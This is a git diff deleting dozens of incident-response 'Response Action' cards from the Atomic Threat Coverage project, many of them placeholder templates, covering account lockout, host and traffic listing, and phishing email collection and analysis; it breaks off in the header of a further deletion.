diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1510_get_ability_to_remove_service.md b/Atomic_Threat_Coverage/Response_Actions/RA_1510_get_ability_to_remove_service.md
deleted file mode 100644
index 19ed61f..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1510_get_ability_to_remove_service.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to remove service         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1510            |
-| **Description**             | Make sure you have the ability to remove a service   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1601_manage_identity_management_system.md b/Atomic_Threat_Coverage/Response_Actions/RA_1601_manage_identity_management_system.md
deleted file mode 100644
index b056f1a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1601_manage_identity_management_system.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Manage identity management system         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1601            |
-| **Description**             | Make sure you can manage Identity Management System, i.e. remove/block users, revoke credentials, and execute other Response Actions   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1602_get_ability_to_lock_user_account.md b/Atomic_Threat_Coverage/Response_Actions/RA_1602_get_ability_to_lock_user_account.md
deleted file mode 100644
index 16cfd2b..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1602_get_ability_to_lock_user_account.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to lock user account         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1602            |
-| **Description**             | Make sure you have the ability to lock user account from being used   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1603_get_ability_to_list_users_authenticated.md b/Atomic_Threat_Coverage/Response_Actions/RA_1603_get_ability_to_list_users_authenticated.md
deleted file mode 100644
index cbd0e1a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1603_get_ability_to_list_users_authenticated.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list users authenticated         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1603            |
-| **Description**             | Make sure you have the ability to list users authenticated at a particular time in the past on a particular system   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1604_get_ability_to_revoke_authentication_credentials.md b/Atomic_Threat_Coverage/Response_Actions/RA_1604_get_ability_to_revoke_authentication_credentials.md
deleted file mode 100644
index a94c4d8..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1604_get_ability_to_revoke_authentication_credentials.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to revoke authentication credentials         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1604            |
-| **Description**             | Make sure you have the ability to revoke authentication credentials   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1605_get_ability_to_remove_user_account.md b/Atomic_Threat_Coverage/Response_Actions/RA_1605_get_ability_to_remove_user_account.md
deleted file mode 100644
index ff723be..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1605_get_ability_to_remove_user_account.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to remove user account         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1605            |
-| **Description**             | Make sure you have the ability to remove a user account   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2001_list_victims_of_security_alert.md b/Atomic_Threat_Coverage/Response_Actions/RA_2001_list_victims_of_security_alert.md
deleted file mode 100644
index 2a98a9c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2001_list_victims_of_security_alert.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List victims of security alert         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2001            |
-| **Description**             | List victims of a security alert   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2002_list_host_vulnerabilities.md b/Atomic_Threat_Coverage/Response_Actions/RA_2002_list_host_vulnerabilities.md
deleted file mode 100644
index c4148dd..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2002_list_host_vulnerabilities.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List host vulnerabilities         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2002            |
-| **Description**             | Get information about a specific host existing vulnerabilities, or about vulnerabilities it had at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2003_put_compromised_accounts_on_monitoring.md b/Atomic_Threat_Coverage/Response_Actions/RA_2003_put_compromised_accounts_on_monitoring.md
deleted file mode 100644
index 97b4db3..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2003_put_compromised_accounts_on_monitoring.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Put compromised accounts on monitoring         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2003            |
-| **Description**             | Put (potentially) compromised accounts on monitoring   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | General      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-
-### Workflow
-
-Start monitoring for authentification attempts and all potentially harmful actions from (potentially) compromised accounts.  
-Look for anomalies, unusual network connections, unusual geolocation/time of work, actions that were never executed before.  
-Keep in touch with the real users and, in case of need, ask them if they executing some suspicious actions by themselves or not.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2101_list_hosts_communicated_with_internal_domain.md b/Atomic_Threat_Coverage/Response_Actions/RA_2101_list_hosts_communicated_with_internal_domain.md
deleted file mode 100644
index f0dfa0d..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2101_list_hosts_communicated_with_internal_domain.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List hosts communicated with internal domain         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2101            |
-| **Description**             | List hosts communicated with an internal domain   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2102_list_hosts_communicated_with_internal_ip.md b/Atomic_Threat_Coverage/Response_Actions/RA_2102_list_hosts_communicated_with_internal_ip.md
deleted file mode 100644
index 80e9324..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2102_list_hosts_communicated_with_internal_ip.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List hosts communicated with internal IP         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2102            |
-| **Description**             | List hosts communicated with an internal IP address   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2103_list_hosts_communicated_with_internal_url.md b/Atomic_Threat_Coverage/Response_Actions/RA_2103_list_hosts_communicated_with_internal_url.md
deleted file mode 100644
index 1a50215..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2103_list_hosts_communicated_with_internal_url.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List hosts communicated with internal URL         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2103            |
-| **Description**             | List hosts communicated with an internal URL   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2104_analyse_domain_name.md b/Atomic_Threat_Coverage/Response_Actions/RA_2104_analyse_domain_name.md
deleted file mode 100644
index 3838226..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2104_analyse_domain_name.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse domain name         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2104            |
-| **Description**             | Analyse a domain name   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2105_analyse_ip.md b/Atomic_Threat_Coverage/Response_Actions/RA_2105_analyse_ip.md
deleted file mode 100644
index d5112c5..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2105_analyse_ip.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse IP         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2105            |
-| **Description**             | Analyse an IP address   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2106_analyse_uri.md b/Atomic_Threat_Coverage/Response_Actions/RA_2106_analyse_uri.md
deleted file mode 100644
index fd93e6b..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2106_analyse_uri.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse uri         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2106            |
-| **Description**             | Analyse an URI   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2107_list_hosts_communicated_by_port.md b/Atomic_Threat_Coverage/Response_Actions/RA_2107_list_hosts_communicated_by_port.md
deleted file mode 100644
index 26023c8..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2107_list_hosts_communicated_by_port.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List hosts communicated by port         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2107            |
-| **Description**             | List hosts communicating by a specific port at the moment or at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2108_list_hosts_connected_to_vpn.md b/Atomic_Threat_Coverage/Response_Actions/RA_2108_list_hosts_connected_to_vpn.md
deleted file mode 100644
index a731e4a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2108_list_hosts_connected_to_vpn.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List hosts connected to VPN         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2108            |
-| **Description**             | List hosts connected to a VPN at the moment or at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2109_list_hosts_connected_to_intranet.md b/Atomic_Threat_Coverage/Response_Actions/RA_2109_list_hosts_connected_to_intranet.md
deleted file mode 100644
index bc3d2dd..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2109_list_hosts_connected_to_intranet.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List hosts connected to intranet         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2109            |
-| **Description**             | List hosts connected to the internal network at the moment or at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive/phantom/demisto/etc</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2110_list_data_transferred.md b/Atomic_Threat_Coverage/Response_Actions/RA_2110_list_data_transferred.md
deleted file mode 100644
index 1ce0d35..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2110_list_data_transferred.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List data transferred         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2110            |
-| **Description**             | List the data that is being transferred at the moment or at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2111_collect_transferred_data.md b/Atomic_Threat_Coverage/Response_Actions/RA_2111_collect_transferred_data.md
deleted file mode 100644
index 4a5e3c0..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2111_collect_transferred_data.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Collect transferred data         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2111            |
-| **Description**             | Collect the data that is being transferred at the moment or at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2112_identify_transferred_data.md b/Atomic_Threat_Coverage/Response_Actions/RA_2112_identify_transferred_data.md
deleted file mode 100644
index 10e06d7..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2112_identify_transferred_data.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Identify transferred data         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2112            |
-| **Description**             | Identify the data that is being transferred at the moment or at a particular time in the past (i.e. its content, value)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2113_list_hosts_communicated_with_external_domain.md b/Atomic_Threat_Coverage/Response_Actions/RA_2113_list_hosts_communicated_with_external_domain.md
deleted file mode 100644
index d2293a5..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2113_list_hosts_communicated_with_external_domain.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | List hosts communicated with external domain         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2113            |
-| **Description**             | List hosts communicated with an external domain   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Requirements** |<ul><li>DN_zeek_conn_log</li><li>DN_zeek_dns_log</li><li>DN_zeek_http_log</li><li>DN_dns_log</li><li>DN_proxy_log</li><li>DN_network_flow_log</li></ul>|
-
-### Workflow
-
-List hosts communicated with an external domain using the most efficient way.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2114_list_hosts_communicated_with_external_ip.md b/Atomic_Threat_Coverage/Response_Actions/RA_2114_list_hosts_communicated_with_external_ip.md
deleted file mode 100644
index 13dd103..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2114_list_hosts_communicated_with_external_ip.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | List hosts communicated with external IP         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2114            |
-| **Description**             | List hosts communicated with an external IP address   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Requirements** |<ul><li>DN_network_flow_log</li><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-List hosts communicated with an external IP address using the most efficient way.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2115_list_hosts_communicated_with_external_url.md b/Atomic_Threat_Coverage/Response_Actions/RA_2115_list_hosts_communicated_with_external_url.md
deleted file mode 100644
index ff2d9ac..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2115_list_hosts_communicated_with_external_url.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | List hosts communicated with external URL         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2115            |
-| **Description**             | List hosts communicated with an external URL   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Requirements** |<ul><li>DN_zeek_http_log</li><li>DN_proxy_log</li></ul>|
-
-### Workflow
-
-List hosts communicated with an external URL using the most efficient way.  
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2116_find_data_transferred_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_2116_find_data_transferred_by_content_pattern.md
deleted file mode 100644
index 1bae292..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2116_find_data_transferred_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find data transferred by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2116            |
-| **Description**             | Find the data that is being transferred at the moment or at a particular time in the past by its content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2201_list_users_opened_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_2201_list_users_opened_email_message.md
deleted file mode 100644
index e1cc7b5..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2201_list_users_opened_email_message.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | List users opened email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2201            |
-| **Description**             | List users that have opened am email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://practical365.com/exchange-server/tracking-read-email-messages-exchange-server/](https://practical365.com/exchange-server/tracking-read-email-messages-exchange-server/)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-List users who opened/read a particular email message using the Email Server's functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2202_collect_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_2202_collect_email_message.md
deleted file mode 100644
index f29383c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2202_collect_email_message.md
+++ /dev/null
@@ -1,23 +0,0 @@
-| Title                       | Collect email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2202            |
-| **Description**             | Collect an email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://www.lifewire.com/save-an-email-as-an-eml-file-in-gmail-1171956](https://www.lifewire.com/save-an-email-as-an-eml-file-in-gmail-1171956)</li><li>[https://eml.tooutlook.com/](https://eml.tooutlook.com/)</li></ul>|
-
-### Workflow
-
-Collect an email message using the most appropriate option:  
-
-- Email Team/Email server: if there is such option  
-- The person that reported the attack (if it wasn't detected automatically or reported by victims)  
-- Victims: if they reported the attack  
-- Following the local computer forensic evidence collection procedure, if the situation requires it
-
-Ask for the email in `.EML` format. Instructions:  
-
-  1. Drug and drop email from Email client to Desktop  
-  2. Archive with password "infected" and send to IR specialists by email  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2203_list_email_message_receivers.md b/Atomic_Threat_Coverage/Response_Actions/RA_2203_list_email_message_receivers.md
deleted file mode 100644
index 7721227..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2203_list_email_message_receivers.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | List email message receivers         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2203            |
-| **Description**             | List receivers of a particular email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://docs.microsoft.com/en-us/powershell/module/exchange/mail-flow/get-messagetrackinglog?view=exchange-ps](https://docs.microsoft.com/en-us/powershell/module/exchange/mail-flow/get-messagetrackinglog?view=exchange-ps)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-List receivers of a particular email message using the Email Server's functionality.  
\ No newline at end of file
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2204_make_sure_email_message_is_phishing.md b/Atomic_Threat_Coverage/Response_Actions/RA_2204_make_sure_email_message_is_phishing.md
deleted file mode 100644
index 0b48afa..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2204_make_sure_email_message_is_phishing.md
+++ /dev/null
@@ -1,20 +0,0 @@
-| Title                       | Make sure email message is phishing         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2204            |
-| **Description**             | Make sure that an email message is a phishing attack   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://en.wikipedia.org/wiki/Phishing](https://en.wikipedia.org/wiki/Phishing)</li><li>[http://www.phishing.org/phishing-examples](http://www.phishing.org/phishing-examples)</li></ul>|
-
-### Workflow
-
-Check an email and its metadata for evidences of phishing attack:  
-
-- **Impersonalisation attempts**: sender is trying to identify himself as somebody he is not  
-- **Suspicious askings or offers**: download "invoice", click on link with something important etc  
-- **Psychological manipulations**: invoking a sense of urgency or fear is a common phishing tactic  
-- **Spelling mistakes**: legitimate messages usually don't have spelling mistakes or poor grammar  
-
-Explore references of the article to make yourself familiar with phishing attacks history and examples.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2205_extract_observables_from_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_2205_extract_observables_from_email_message.md
deleted file mode 100644
index f8ee4b7..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2205_extract_observables_from_email_message.md
+++ /dev/null
@@ -1,22 +0,0 @@
-| Title                       | Extract observables from email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2205            |
-| **Description**             | Extract observables from an email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://ubuntuincident.wordpress.com/2010/09/27/extract-email-attachments/](https://ubuntuincident.wordpress.com/2010/09/27/extract-email-attachments/)</li><li>[https://blog.thehive-project.org/2018/07/31/emlparser-a-new-cortex-analyzer-for-eml-files/](https://blog.thehive-project.org/2018/07/31/emlparser-a-new-cortex-analyzer-for-eml-files/)</li></ul>|
-
-### Workflow
-
-Extract the data for further response steps:  
-
-- attachments (using munpack tool: `munpack email.eml`)  
-- from, to, cc  
-- subject of the email  
-- received servers path  
-- list of URLs from the text content of the mail body and attachments  
-
-This Response Action could be automated with [TheHive EmlParser](https://blog.thehive-project.org/2018/07/31/emlparser-a-new-cortex-analyzer-for-eml-files/).  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2301_list_files_created.md b/Atomic_Threat_Coverage/Response_Actions/RA_2301_list_files_created.md
deleted file mode 100644
index 14882c9..0000000
